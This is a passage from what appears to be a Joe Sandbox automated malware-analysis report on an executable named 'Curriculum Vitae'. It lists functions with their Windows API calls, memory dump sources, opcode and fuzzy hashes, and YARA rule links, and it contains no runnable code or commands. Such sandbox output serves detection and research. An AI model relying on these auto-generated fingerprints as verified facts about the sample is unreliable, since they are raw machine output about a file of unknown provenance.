                      • GetCurrentThreadId.KERNEL32 ref: 00D9E1FD
                      • MessageBoxW.USER32(?,?,?,?), ref: 00D9E230
                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00D9E246
                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00D9E24D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                      • String ID:
                      • API String ID: 2880819207-0
                      • Opcode ID: 54a76fb8997db48cd2d5bb307891d1cd1202686c5cd8c167e93663f5cf45e888
                      • Instruction ID: 5067afe95f1c9aa093a7236d5acb28049abfb30392218d4622efa2b900c85169
                      • Opcode Fuzzy Hash: 54a76fb8997db48cd2d5bb307891d1cd1202686c5cd8c167e93663f5cf45e888
                      • Instruction Fuzzy Hash: 74110472904359BFCB01DBE9AC09E9E7FACEB45320F184255F928E7391D6B5C90887B0
                      Function 00D5D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                      Download Yara Rule
                      APIs
                      • CreateThread.KERNEL32(00000000,?,00D5CFF9,00000000,00000004,00000000), ref: 00D5D218
                      • GetLastError.KERNEL32 ref: 00D5D224
                      • __dosmaperr.LIBCMT ref: 00D5D22B
                      • ResumeThread.KERNEL32(00000000), ref: 00D5D249
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                      • String ID:
                      • API String ID: 173952441-0
                      • Opcode ID: 3f657bad3bdfc70291fd5500ae142493c7d12b7e6f5faf9accda22cb9bfd313e
                      • Instruction ID: a79b5391a5d87e1f62369b243e7d17caa46142cfa35c038efe0aa09694100789
                      • Opcode Fuzzy Hash: 3f657bad3bdfc70291fd5500ae142493c7d12b7e6f5faf9accda22cb9bfd313e
                      • Instruction Fuzzy Hash: 2201D276815305BBCF216BA6DC09FAE7A6ADF82332F240219FD25D61D0DB70C909C6B0
                      Function 00D3600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                      Download Yara Rule
                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D3604C
                      • GetStockObject.GDI32(00000011), ref: 00D36060
                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D3606A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CreateMessageObjectSendStockWindow
                      • String ID:
                      • API String ID: 3970641297-0
                      • Opcode ID: a9903cb72e19a5b21be71e59e705da550397e5a8276f174f21576c28719a77b2
                      • Instruction ID: d3cbec7987fceb12b46398ce2d2d5c58a2a147ad06b4fd1ba7b7f76351d09d77
                      • Opcode Fuzzy Hash: a9903cb72e19a5b21be71e59e705da550397e5a8276f174f21576c28719a77b2
                      • Instruction Fuzzy Hash: 17116D7250160ABFEF164FA49C45EEABB69EF093A4F084215FB1892160D732DC60DBB0
                      Function 00D53B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00D53B56
                        • Part of subcall function 00D53AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00D53AD2
                        • Part of subcall function 00D53AA3: ___AdjustPointer.LIBCMT ref: 00D53AED
                      • _UnwindNestedFrames.LIBCMT ref: 00D53B6B
                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00D53B7C
                      • CallCatchBlock.LIBVCRUNTIME ref: 00D53BA4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                      • String ID:
                      • API String ID: 737400349-0
                      • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                      • Instruction ID: b5930c9db48c05da78defbaeca5984f761e311313fa7f354e3cf2c380d3faa19
                      • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                      • Instruction Fuzzy Hash: E0014C32100148BBDF125E95CC42EEB3F6DEF58799F044014FE5896121C732E965DBB0
                      Function 00D63073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00D313C6,00000000,00000000,?,00D6301A,00D313C6,00000000,00000000,00000000,?,00D6328B,00000006,FlsSetValue), ref: 00D630A5
                      • GetLastError.KERNEL32(?,00D6301A,00D313C6,00000000,00000000,00000000,?,00D6328B,00000006,FlsSetValue,00DD2290,FlsSetValue,00000000,00000364,?,00D62E46), ref: 00D630B1
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D6301A,00D313C6,00000000,00000000,00000000,?,00D6328B,00000006,FlsSetValue,00DD2290,FlsSetValue,00000000), ref: 00D630BF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: LibraryLoad$ErrorLast
                      • String ID:
                      • API String ID: 3177248105-0
                      • Opcode ID: adf679b4834bdb60b9f65137ba63e6674f67d928198c1cf6b07dcdf0f12ba21e
                      • Instruction ID: 096079aa3c56c5ba9c31b0b47894903d66ec94dd68d72b2d4112a6df1a8fa8ae
                      • Opcode Fuzzy Hash: adf679b4834bdb60b9f65137ba63e6674f67d928198c1cf6b07dcdf0f12ba21e
                      • Instruction Fuzzy Hash: 4301F732311323ABCB314F79AC44E577B98EF05BA1B140620FA09E3280C721D909C7F0
                      Function 00D97464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00D9747F
                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00D97497
                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00D974AC
                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00D974CA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Type$Register$FileLoadModuleNameUser
                      • String ID:
                      • API String ID: 1352324309-0
                      • Opcode ID: 54cc4364378f68bcd4cbd59d32e4438898a0c845acf8d1c4566a75ae81d98050
                      • Instruction ID: 8f3f9af99d636e230ca132122912f87c570cc3407fb90174e8729d8f670880a7
                      • Opcode Fuzzy Hash: 54cc4364378f68bcd4cbd59d32e4438898a0c845acf8d1c4566a75ae81d98050
                      • Instruction Fuzzy Hash: 76116DB5629316ABEB208F54DC09F967BFCEF00B04F108569E65AD6192D7B0E904DBB0
                      Function 00D9B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                      Download Yara Rule
                      APIs
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00D9ACD3,?,00008000), ref: 00D9B0C4
                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00D9ACD3,?,00008000), ref: 00D9B0E9
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00D9ACD3,?,00008000), ref: 00D9B0F3
                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00D9ACD3,?,00008000), ref: 00D9B126
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CounterPerformanceQuerySleep
                      • String ID:
                      • API String ID: 2875609808-0
                      • Opcode ID: 573a963d8118556d0363e637eebcef332c21483e7f49e394c0d37a174fa63a0e
                      • Instruction ID: b20efb3dd3f4781c69992a723534bb1220d6439ef7caafd622924cb38a33515c
                      • Opcode Fuzzy Hash: 573a963d8118556d0363e637eebcef332c21483e7f49e394c0d37a174fa63a0e
                      • Instruction Fuzzy Hash: A5115E31D0172EE7CF009FE5EA68AEEBB78FF4A721F164096D945B2241CB3095508B71
                      Function 00D92DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D92DC5
                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00D92DD6
                      • GetCurrentThreadId.KERNEL32 ref: 00D92DDD
                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00D92DE4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                      • String ID:
                      • API String ID: 2710830443-0
                      • Opcode ID: 7e6c32f300bc121c4ed3ae6704a79f1704e74b790669f4f74488cd9af172bfa1
                      • Instruction ID: 2e14bf200ffc766376cd28dac39cc83fc1ad0dd3b9a1a3d42f9c59b288447ca5
                      • Opcode Fuzzy Hash: 7e6c32f300bc121c4ed3ae6704a79f1704e74b790669f4f74488cd9af172bfa1
                      • Instruction Fuzzy Hash: 79E092716513267BDB201BB39C0DFFB3E6CEF42BA1F041115F20AD15909AA4C841C6F0
                      Function 00DC8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D49639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D49693
                        • Part of subcall function 00D49639: SelectObject.GDI32(?,00000000), ref: 00D496A2
                        • Part of subcall function 00D49639: BeginPath.GDI32(?), ref: 00D496B9
                        • Part of subcall function 00D49639: SelectObject.GDI32(?,00000000), ref: 00D496E2
                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00DC8887
                      • LineTo.GDI32(?,?,?), ref: 00DC8894
                      • EndPath.GDI32(?), ref: 00DC88A4
                      • StrokePath.GDI32(?), ref: 00DC88B2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                      • String ID:
                      • API String ID: 1539411459-0
                      • Opcode ID: 185320c9830ea5e1c7f51b1247d7d5774c6fb3a1620083f9050e4b4e9363f2cd
                      • Instruction ID: 957dc36f89c1f5e16aa0b44a065ce3540817f58bc7e8f54a75e1638491d9084f
                      • Opcode Fuzzy Hash: 185320c9830ea5e1c7f51b1247d7d5774c6fb3a1620083f9050e4b4e9363f2cd
                      • Instruction Fuzzy Hash: DEF09A3600121BBADB125F95AC09FCA3A19AF06310F448004FB01A61E1C7751550EBF5
                      Function 00D498B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                      Download Yara Rule
                      APIs
                      • GetSysColor.USER32(00000008), ref: 00D498CC
                      • SetTextColor.GDI32(?,?), ref: 00D498D6
                      • SetBkMode.GDI32(?,00000001), ref: 00D498E9
                      • GetStockObject.GDI32(00000005), ref: 00D498F1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Color$ModeObjectStockText
                      • String ID:
                      • API String ID: 4037423528-0
                      • Opcode ID: 9052f6ff95fee1bce6d068c162123db88f498bc2302941c91dfbabed6a7da16a
                      • Instruction ID: 0908a7df67145d3dc5fc88d27df45fefc89b0623da0caf9d5543b629bde7c2a3
                      • Opcode Fuzzy Hash: 9052f6ff95fee1bce6d068c162123db88f498bc2302941c91dfbabed6a7da16a
                      • Instruction Fuzzy Hash: 42E03931654782AADB215B79AC09BE93B20AB12336F189219F7BA981E1C37186409B30
                      Function 00D9162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentThread.KERNEL32 ref: 00D91634
                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00D911D9), ref: 00D9163B
                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00D911D9), ref: 00D91648
                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00D911D9), ref: 00D9164F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CurrentOpenProcessThreadToken
                      • String ID:
                      • API String ID: 3974789173-0
                      • Opcode ID: a0baedd52f35a1faea1cdcbd3c4535ae0e0d001193aaf2f2dc691f7026044b3e
                      • Instruction ID: 1c0f5b6a0a25c9085fd3b7eb23fba2fc60984f128ce17d6eccae841cb772169b
                      • Opcode Fuzzy Hash: a0baedd52f35a1faea1cdcbd3c4535ae0e0d001193aaf2f2dc691f7026044b3e
                      • Instruction Fuzzy Hash: 17E04676A12313ABDB201BE0AE0DF863B68AF84792F188808F349C9080E6388441CB74
                      Function 00D8D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                      Download Yara Rule
                      APIs
                      • GetDesktopWindow.USER32 ref: 00D8D858
                      • GetDC.USER32(00000000), ref: 00D8D862
                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D8D882
                      • ReleaseDC.USER32(?), ref: 00D8D8A3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CapsDesktopDeviceReleaseWindow
                      • String ID:
                      • API String ID: 2889604237-0
                      • Opcode ID: f5ff0ea7d799463ef41402d44aeecfc677c5c328a309226ae068b51bbf58da4e
                      • Instruction ID: 949832287928c7dacbacc3f99d45992772471b645609bb954929b3db829967ee
                      • Opcode Fuzzy Hash: f5ff0ea7d799463ef41402d44aeecfc677c5c328a309226ae068b51bbf58da4e
                      • Instruction Fuzzy Hash: C9E012B4850306DFCB419FA0D90CA6DBBB2FB08310F149005F94AE7360C7348501AF60
                      Function 00D8D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                      Download Yara Rule
                      APIs
                      • GetDesktopWindow.USER32 ref: 00D8D86C
                      • GetDC.USER32(00000000), ref: 00D8D876
                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D8D882
                      • ReleaseDC.USER32(?), ref: 00D8D8A3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CapsDesktopDeviceReleaseWindow
                      • String ID:
                      • API String ID: 2889604237-0
                      • Opcode ID: 345d3e508ededb3fbc5647f4335ee343316ce3eeb88eb6e487c0ac5b7d4461e5
                      • Instruction ID: cdac58d9c4fd77a6a6e7c80842c54bb5da2a083963648447c65bec7852a4542c
                      • Opcode Fuzzy Hash: 345d3e508ededb3fbc5647f4335ee343316ce3eeb88eb6e487c0ac5b7d4461e5
                      • Instruction Fuzzy Hash: 15E09A75850306DFCB519FA0D90CA6DBBB5FB48311F14A449FA4AE7360D7399902AF60
                      Function 00DA4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D37620: _wcslen.LIBCMT ref: 00D37625
                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00DA4ED4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Connection_wcslen
                      • String ID: *$LPT
                      • API String ID: 1725874428-3443410124
                      • Opcode ID: 4c8c6cc538dc675393b8fa90ee0bc93cdef5c66870296be43cdddbb91fb23c38
                      • Instruction ID: 3c1a7bdcde216c3c8c08f84f2b2ec85f1c8c939abec48158cd1ad37a67ed2336
                      • Opcode Fuzzy Hash: 4c8c6cc538dc675393b8fa90ee0bc93cdef5c66870296be43cdddbb91fb23c38
                      • Instruction Fuzzy Hash: F5914F75A012049FCB14DF58C484EAABBF1EF85304F198099E84A9F362D775EE85CBB1
                      Function 00D5E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                      Download Yara Rule
                      APIs
                      • __startOneArgErrorHandling.LIBCMT ref: 00D5E30D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorHandling__start
                      • String ID: pow
                      • API String ID: 3213639722-2276729525
                      • Opcode ID: 8e42602fbddde61ab1027a9b8dcac7343325b301fe5142595ff2730d44deb850
                      • Instruction ID: f8c3a1c2c0640698702e4d473681dc4eeae4d62a80d3bd0e21633f44c101cbdf
                      • Opcode Fuzzy Hash: 8e42602fbddde61ab1027a9b8dcac7343325b301fe5142595ff2730d44deb850
                      • Instruction Fuzzy Hash: FF519B61A0C20697DF197724C9013792B94EF10746F284D99FCD1823A9EB318DCD9A76
                      Function 00D4E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID: #
                      • API String ID: 0-1885708031
                      • Opcode ID: f7baebd65fe0cb8614741d4afe3d35bf74b834af07ad03f1464f7cfe460cddc4
                      • Instruction ID: cff0c5c475c4dd0a0bd38595100efaa167b9c501c03ec9ffc509c364ca6ca7bb
                      • Opcode Fuzzy Hash: f7baebd65fe0cb8614741d4afe3d35bf74b834af07ad03f1464f7cfe460cddc4
                      • Instruction Fuzzy Hash: 0A512375604346EFDB15EF28C881ABE7BA8FF55310F288155E8919B2D0D674DD42CBB0
                      Function 00D4F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                      Download Yara Rule
                      APIs
                      • Sleep.KERNEL32(00000000), ref: 00D4F2A2
                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00D4F2BB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
